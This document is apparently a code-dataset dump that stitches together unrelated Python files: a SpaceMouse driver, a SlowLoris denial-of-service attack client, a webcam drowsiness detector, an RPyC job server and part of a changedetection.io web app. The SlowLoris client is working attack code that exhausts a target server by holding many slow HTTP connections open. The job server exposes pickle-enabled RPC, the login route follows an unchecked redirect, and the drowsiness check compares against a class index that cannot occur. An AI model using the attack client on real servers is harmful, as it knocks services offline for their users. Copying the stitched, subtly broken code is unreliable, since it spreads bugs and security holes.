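    assert to_int16(0x00, 0x80) == -32768    # sign bit set in the high byte
    assert scale_to_control(700) == 1.0      # 700 / 350 = 2.0, clamped to max_v
    assert abs(scale_to_control(175) - 0.5) < 1e-9
    assert convert(0x00, 0x00) == 0.0        # convert() chains both steps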
class SpaceMouse(Device):
"""A minimalistic driver class for SpaceMouse with HID library."""
def __init__(self,
vendor_id=9583,
product_id=50735,
pos_sensitivity=1.0,
rot_sensitivity=1.0
):
"""Initialize a SpaceMouse handler.
Args:
vendor_id: HID device vendor id
product_id: HID device product id
pos_sensitivity: Magnitude of input position command scaling
            rot_sensitivity: Magnitude of input rotation command scaling
Note:
Use hid.enumerate() to view all USB human interface devices (HID).
Make sure SpaceMouse is detected before running the script.
You can look up its vendor/product id from this method.
"""
print("Opening SpaceMouse device")
self.device = hid.device()
self.device.open(vendor_id, product_id) # SpaceMouse
self.pos_sensitivity = pos_sensitivity
self.rot_sensitivity = rot_sensitivity
print("Manufacturer: %s" % self.device.get_manufacturer_string())
print("Product: %s" % self.device.get_product_string())
self._display_controls()
self.single_click_and_hold = False
self._control = [0., 0., 0., 0., 0., 0.]
self._reset_state = 0
self.rotation = np.array([[-1., 0., 0.], [0., 1., 0.], [0., 0., -1.]])
self._enabled = False
# launch a new listener thread to listen to SpaceMouse
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def _display_controls(self):
"""
Method to pretty print controls.
"""
def print_command(char, info):
char += " " * (30 - len(char))
print("{}\t{}".format(char, info))
print("")
print_command("Control", "Command")
print_command("Right button", "reset simulation")
print_command("Left button (hold)", "close gripper")
print_command("Move mouse laterally", "move arm horizontally in x-y plane")
print_command("Move mouse vertically", "move arm vertically")
print_command(
"Twist mouse about an axis", "rotate arm about a corresponding axis"
)
print_command("ESC", "quit")
print("")
def _reset_internal_state(self):
"""
Resets internal state of controller, except for the reset signal.
"""
self.rotation = np.array([[-1., 0., 0.], [0., 1., 0.], [0., 0., -1.]])
def start_control(self):
"""
Method that should be called externally before controller can
start receiving commands.
"""
self._reset_internal_state()
self._reset_state = 0
self._enabled = True
def get_controller_state(self):
"""Returns the current state of the 3d mouse, a dictionary of pos, orn, grasp, and reset."""
dpos = self.control[:3] * 0.005 * self.pos_sensitivity
roll, pitch, yaw = self.control[3:] * 0.005 * self.rot_sensitivity
self.grasp = self.control_gripper
# convert RPY to an absolute orientation
drot1 = rotation_matrix(angle=-pitch, direction=[1., 0, 0], point=None)[:3, :3]
drot2 = rotation_matrix(angle=roll, direction=[0, 1., 0], point=None)[:3, :3]
drot3 = rotation_matrix(angle=yaw, direction=[0, 0, 1.], point=None)[:3, :3]
self.rotation = self.rotation.dot(drot1.dot(drot2.dot(drot3)))
return dict(
dpos=dpos,
rotation=self.rotation,
raw_drotation=np.array([roll, pitch, yaw]),
grasp=self.grasp,
reset=self._reset_state
)
def run(self):
"""Listener method that keeps pulling new messages."""
t_last_click = -1
while True:
d = self.device.read(13)
if d is not None and self._enabled:
if d[0] == 1: ## readings from 6-DoF sensor
self.y = convert(d[1], d[2])
self.x = convert(d[3], d[4])
self.z = convert(d[5], d[6]) * -1.0
self.roll = convert(d[7], d[8])
self.pitch = convert(d[9], d[10])
self.yaw = convert(d[11], d[12])
self._control = [
self.x,
self.y,
self.z,
self.roll,
self.pitch,
self.yaw,
]
elif d[0] == 3: ## readings from the side buttons
# press left button
if d[1] == 1:
t_click = time.time()
elapsed_time = t_click - t_last_click
t_last_click = t_click
self.single_click_and_hold = True
# release left button
if d[1] == 0:
self.single_click_and_hold = False
# right button is for reset
if d[1] == 2:
self._reset_state = 1
self._enabled = False
self._reset_internal_state()
@property
def control(self):
"""Returns 6-DoF control."""
return np.array(self._control)
@property
def control_gripper(self):
"""Maps internal states into gripper commands."""
if self.single_click_and_hold:
return 1.0
return 0
if __name__ == "__main__":
space_mouse = SpaceMouse()
for i in range(100):
print(space_mouse.control, space_mouse.control_gripper)
time.sleep(0.02)
|
client.py
|
"""This module implements the SlowLoris client."""
import threading
import time
from .connection import LorisConnection
from .user_agent import get_random_user_agent
class LorisClient:
"""SlowLoris attack client."""
    def __init__(self, client_ips=None):
        self.targets = []
        self.client_ips = client_ips or []
        self.keepalive_thread = threading.Thread(target=self.keep_alive)
        self.keepalive_thread.daemon = True
        self.keepalive_thread.start()
def attack(self, target):
"""Starts the attack."""
self.targets.append(target)
print("[{}] Initializing {} connections.".format(target.host, target.count))
# Start 'count' connections and send the initial HTTP headers.
for i in range(target.count):
conn = LorisConnection(target,self.client_ips, True).send_headers(get_random_user_agent())
target.connections.insert(0, conn)
if i == target.count - 1:
print("[{}] All connections initialized.".format(target.host))
def stop(self):
"""Stops the attack."""
for target in self.targets:
print("[{}] Shutting down all connections.".format(target.host))
for conn in target.connections:
conn.close()
def keep_alive(self):
"""Keeps all targets alive and maintains their connections."""
while True:
time.sleep(2)
# Iterate over all targets.
for target in self.targets:
self.keep_target_alive(target)
def keep_target_alive(self, target):
"""Keeps a target alive and maintains its connections."""
# Print latest latency.
latency = target.get_latency()
        if latency is not None:
print("[{}] Current latency: {:.2f} ms".format(target.host, latency))
connection_count = len(target.connections)
# Every 10 seconds, send HTTP nonsense to prevent the connection from timing out.
for i in range(0, connection_count):
try:
target.connections[i].keep_alive()
# If the server closed one of our connections,
# re-open the connection in its place.
except: # pylint: disable=bare-except
# Notify the user that the host started dropping connections
# if this connection was the first one being dropped.
if target.dropped_connections == 0:
print("[{}] Server started dropping connections.".format(target.host))
target.dropped_connections += 1
# Notify the user about the amount of reconnections.
threshold = 10
if target.reconnections >= threshold:
print("[{}] Reconnected {} dropped connections."
.format(target.host, target.reconnections))
target.reconnections = 0
# Reconnect the socket.
conn = LorisConnection(target,self.client_ips).send_headers(get_random_user_agent())
if conn.is_connected:
target.connections[i] = conn
target.reconnections += 1
|
detect_drowsiness.py
|
import cv2
import numpy as np
from keras.models import load_model
from keras.preprocessing.image import img_to_array
from playsound import playsound
from threading import Thread
def start_alarm(sound):
    """Play the alarm sound."""
    playsound(sound)
classes = ['Closed', 'Open']
face_cascade = cv2.CascadeClassifier("data/haarcascade_frontalface_default.xml")
left_eye_cascade = cv2.CascadeClassifier("data/haarcascade_lefteye_2splits.xml")
right_eye_cascade = cv2.CascadeClassifier("data/haarcascade_righteye_2splits.xml")
cap = cv2.VideoCapture(0)
model = load_model("drowiness_new7.h5")
count = 0
alarm_on = False
alarm_sound = "data/alarm.mp3"
status1 = ''
status2 = ''
while True:
_, frame = cap.read()
height = frame.shape[0]
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 1)
roi_gray = gray[y:y+h, x:x+w]
roi_color = frame[y:y+h, x:x+w]
left_eye = left_eye_cascade.detectMultiScale(roi_gray)
right_eye = right_eye_cascade.detectMultiScale(roi_gray)
for (x1, y1, w1, h1) in left_eye:
cv2.rectangle(roi_color, (x1, y1), (x1 + w1, y1 + h1), (0, 255, 0), 1)
eye1 = roi_color[y1:y1+h1, x1:x1+w1]
eye1 = cv2.resize(eye1, (145, 145))
eye1 = eye1.astype('float') / 255.0
eye1 = img_to_array(eye1)
eye1 = np.expand_dims(eye1, axis=0)
pred1 = model.predict(eye1)
status1=np.argmax(pred1)
#print(status1)
#status1 = classes[pred1.argmax(axis=-1)[0]]
break
for (x2, y2, w2, h2) in right_eye:
cv2.rectangle(roi_color, (x2, y2), (x2 + w2, y2 + h2), (0, 255, 0), 1)
eye2 = roi_color[y2:y2 + h2, x2:x2 + w2]
eye2 = cv2.resize(eye2, (145, 145))
eye2 = eye2.astype('float') / 255.0
eye2 = img_to_array(eye2)
eye2 = np.expand_dims(eye2, axis=0)
pred2 = model.predict(eye2)
status2=np.argmax(pred2)
#print(status2)
#status2 = classes[pred2.argmax(axis=-1)[0]]
break
# If the eyes are closed, start counting
if status1 == 2 and status2 == 2:
#if pred1 == 2 and pred2 == 2:
count += 1
cv2.putText(frame, "Eyes Closed, Frame count: " + str(count), (10, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 1)
# if eyes are closed for 10 consecutive frames, start the alarm
if count >= 10:
cv2.putText(frame, "Drowsiness Alert!!!", (100, height-20), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
if not alarm_on:
alarm_on = True
# play the alarm sound in a new thread
t = Thread(target=start_alarm, args=(alarm_sound,))
t.daemon = True
t.start()
else:
cv2.putText(frame, "Eyes Open", (10, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 1)
count = 0
alarm_on = False
cv2.imshow("Drowsiness Detector", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
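# Illustrative helper (not used above): the alert logic above is a debounce
# counter. Consecutive "closed" frames increment it, any "open" frame resets
# it, and the alarm should fire once the count reaches the threshold.
def closed_frame_counter(eye_states, threshold=10):
    """Yield (count, alarm) for each frame, given booleans where True means
    both eyes were classified as closed."""
    count = 0
    for closed in eye_states:
        count = count + 1 if closed else 0
        yield count, count >= threshold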
|
CorrelationNetworkServer.py
|
import os, random, binascii, json, subprocess, configparser
import datetime as dt
from queue import Queue
import threading
from threading import Thread
import pony.orm as pny
import rpyc
from rpyc.utils.server import ThreadedServer
import Datasets
# Parse config
config = configparser.ConfigParser()
#config.read('../../config.ini')
config.read(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, 'config.ini'))
#db = pny.Database("sqlite", "correlation_network_jobs.db", create_db=True)
db = pny.Database('mysql', host=config['general']['host'].strip("'"), user=config['general']['user'].strip("'"), passwd=config['general']['pass'].strip("'"), db=config['general']['db'].strip("'"))
# Get directory of writing data file to
# Data directory is located at the web root's /data/cornea/jobs
# Current file directory is located at the web root's /lib/corx
data_dir = os.path.join(os.path.abspath(__file__ + "/../../../"), 'data', 'cornea', 'jobs')
# Try making the data directory first
try:
os.makedirs(data_dir)
except:
pass
# noinspection PyClassHasNoInit
# Job statuses
class JobStatus:
Submitted, Running, Done, Error, Expired = range(1, 6)
class CorrelationNetworkJob(db.Entity):
# Basic job data
dataset = pny.Required(str)
candidates = pny.Optional(str)
columns = pny.Optional(str)
verbose = pny.Required(bool, default=False)
threshold = pny.Required(float)
minimum_cluster_size = pny.Required(int)
submit_time = pny.Required(dt.datetime, sql_default='CURRENT_TIMESTAMP')
start_time = pny.Optional(dt.datetime)
end_time = pny.Optional(dt.datetime)
# Timepoints
time_elapsed_loading_data = pny.Optional(float)
time_elapsed_cleaning_data = pny.Optional(float)
time_elapsed_calculating_pairs = pny.Optional(float)
time_elapsed_nodes_edges = pny.Optional(float)
time_elapsed_node_clustering = pny.Optional(float)
time_elapsed_squarified_treemap = pny.Optional(float)
time_elapsed_fruchterman_reingold_layout = pny.Optional(float)
# Counts
edge_count = pny.Optional(int)
node_count = pny.Optional(int)
cluster_count = pny.Optional(int)
# Last completed step
last_completed_step = pny.Required(int, default=0)
# Status
status = pny.Required(int, default=JobStatus.Submitted)
status_reason = pny.Optional(str)
# Access counters
view_count = pny.Required(int, default=0)
download_count = pny.Required(int, default=0)
# Identifiers
owner = pny.Optional(str)
owner_salt = pny.Optional(str)
hash_id = pny.Required(str)
# Standard job
standard_job = pny.Required(int, default=0)
db.generate_mapping(create_tables=False)
class RPYCServer:
@pny.db_session
def __init__(self, server_lock):
self.server_lock = server_lock
running_jobs = pny.select(job for job in CorrelationNetworkJob if job.status == JobStatus.Running)
for job in running_jobs:
# Remove the out_file of the job if it exists.
try:
os.remove(os.path.join(data_dir, "{0}.json.gz".format(job.hash_id)))
except:
pass
finally:
job.status = JobStatus.Error
job.status_reason = "unexpected_server_crash"
submitted_jobs = pny.select(j for j in CorrelationNetworkJob
if j.status == JobStatus.Submitted).order_by(CorrelationNetworkJob.submit_time.asc)
self.queue = Queue()
for job in submitted_jobs:
self.queue.put(job.id)
@pny.db_session
def submit_job(self, dataset, candidates, columns, verbose, threshold, minimum_cluster_size, owner, owner_salt):
# Generate 16bit hash
        hash_id = binascii.b2a_hex(os.urandom(16)).decode('utf-8')
# Store columns by index to save space
_dataset = Datasets.all_by_name[dataset]
column_indexes = []
if (columns != ''):
for c in columns.split(','):
column_indexes.append(_dataset.columns.index(c))
# Create job
job = CorrelationNetworkJob(dataset=dataset, candidates=candidates, columns=','.join(str(x) for x in column_indexes), verbose=verbose,
threshold=threshold, minimum_cluster_size=minimum_cluster_size, owner=owner, owner_salt=owner_salt, hash_id=hash_id)
try:
self.server_lock.acquire()
pny.commit()
self.queue.put(job.id)
            return "{{\"job_hash_id\": \"{0}\", \"job_owner\": \"{1}\"}}".format(hash_id, owner)
except:
raise
finally:
self.server_lock.release()
@staticmethod
@pny.db_session
def job_status(job_hash_id):
job = pny.get(j for j in CorrelationNetworkJob if j.hash_id == job_hash_id)
        return (job.hash_id, job.status, job.status_reason, job.owner, job.owner_salt, job.dataset) if job is not None else (-1, 4, "", "", "", "")
@staticmethod
@pny.db_session
def job_queue(job_hash_id):
# Retrieve job ID by hash
jobID = pny.get(j.id for j in CorrelationNetworkJob if j.hash_id == job_hash_id)
# Look for uncompleted jobs
queue = pny.select(j for j in CorrelationNetworkJob if j.id < jobID and (j.status == 1 or j.status == 2))
# Return data
        return [(j.hash_id, j.status, j.status_reason, j.owner, j.owner_salt, j.dataset) for j in queue] if queue is not None else [(-1, 4, "", "", "", "")]
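# Illustrative sketch of the column round-trip used by submit_job and the
# worker loop in main(): selected column names are stored as comma-separated
# indexes into the dataset's column list, then reverse-mapped to names with the
# dataset's name column prepended. ``DemoDataset`` is a stand-in for a real
# Datasets entry.
def _demo_column_roundtrip():
    class DemoDataset:
        name_column = "gene"
        columns = ["leaf", "root", "stem"]

    ds = DemoDataset()
    selected = "root,stem"
    # Encoding (submit side): names -> indexes
    encoded = ",".join(str(ds.columns.index(c)) for c in selected.split(","))
    # Decoding (worker side): indexes -> names, name column first
    decoded = [ds.name_column] + [ds.columns[int(i)] for i in encoded.split(",")]
    assert encoded == "1,2"
    assert decoded == ["gene", "root", "stem"]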
@pny.db_session
def main():
class RPYCService(rpyc.Service):
@staticmethod
def exposed_job_status(job_hash_id):
return server_obj.job_status(job_hash_id)
@staticmethod
def exposed_submit_job(dataset, candidates="", columns="", verbose=False, threshold=0.9,
minimum_cluster_size=5, owner="", owner_salt=""):
return server_obj.submit_job(dataset, candidates, columns, verbose, threshold, minimum_cluster_size, owner, owner_salt)
@staticmethod
def exposed_job_queue(job_hash_id):
return server_obj.job_queue(job_hash_id)
try:
server = ThreadedServer(RPYCService, port=3030, protocol_config={"allow_public_attrs": True,
"allow_pickle": True})
except OSError:
# The port is in use. Exit gracefully.
print("CorrelationNetworkServer.py: The port is in use (the server is already running).")
return
t = Thread(target=server.start)
t.daemon = True
t.start()
server_lock = threading.Lock()
server_obj = RPYCServer(server_lock)
while True:
job_id = server_obj.queue.get()
print("Got job no. {0} from the queue. Loading job from DB.".format(job_id))
job = pny.get(j for j in CorrelationNetworkJob if j.id == job_id)
print("Starting job no. {0} with the hash {1} using dataset {2}.".format(job.id, job.hash_id, job.dataset))
job.status = JobStatus.Running
job.start_time = dt.datetime.today()
pny.commit()
try:
dataset = Datasets.all_by_name[job.dataset]
candidates = None
if job.candidates != "":
candidates = job.candidates.split(",")
columns = []
if job.columns == "":
columns.extend(dataset.columns)
columns_mapped = [dataset.name_column]
columns_mapped.extend(dataset.columns)
else:
columns.extend(job.columns.split(","))
# Reverse map columns by index
columns_mapped = [dataset.name_column]
for c in columns:
columns_mapped.append(dataset.columns[int(c)])
out_file = os.path.join(data_dir, "{0}.json.gz".format(job.hash_id))
import CorrelationNetwork
CorrelationNetwork.create_correlation_network(dataset, candidates, columns_mapped, job.verbose, out_file,
job.threshold, job.minimum_cluster_size, job.owner, job.owner_salt, job.hash_id)
job.status = JobStatus.Done
job.end_time = dt.datetime.today()
print("Job no. {0} (hash: {1}) done.".format(job.id, job.hash_id))
except Exception as e:
job.status = JobStatus.Error
job.status_reason = json.dumps(e.args)
            print("Job no. {0} (hash: {1}) crashed: {2}".format(job.id, job.hash_id, e.args))
finally:
pny.commit()
            if job.owner:
print('Sending mail to job owner at ' + str(job.owner))
mailer = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), 'lib', 'corx', 'mail.php')
script_response = subprocess.check_output(["php", mailer, json.dumps({ 'owner': job.owner, 'hash_id': job.hash_id })])
print(str(script_response))
if __name__ == '__main__':
main()
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
from copy import deepcopy
__version__ = '0.39.4'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
# Needs to be set this way because we also build and publish via pip
base_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__,
static_url_path="{}/static".format(base_path),
template_folder="{}/templates".format(base_path))
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember that Python passes objects by reference.
# populate_form in wtforms didn't work for me (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
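# Illustrative counterpart to User.check_password (an assumption about how the
# stored value is produced elsewhere in the codebase, inferred from the check
# above): the stored blob is base64(salt + pbkdf2_hmac(sha256, password, salt,
# 100000)), where the first 32 bytes are the salt.
def _demo_hash_password(password):
    import base64
    import hashlib
    import secrets

    salt = secrets.token_bytes(32)
    key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    return base64.b64encode(salt + key).decode('ascii')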
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
        # Disable password login if no password is set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
        # 0 means there's only one entry, so there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
            # Re #286 - New data is synced to disk by another thread every 60 seconds,
            # but when something is edited we should save straight away.
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import forms
from changedetectionio import content_fetcher
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
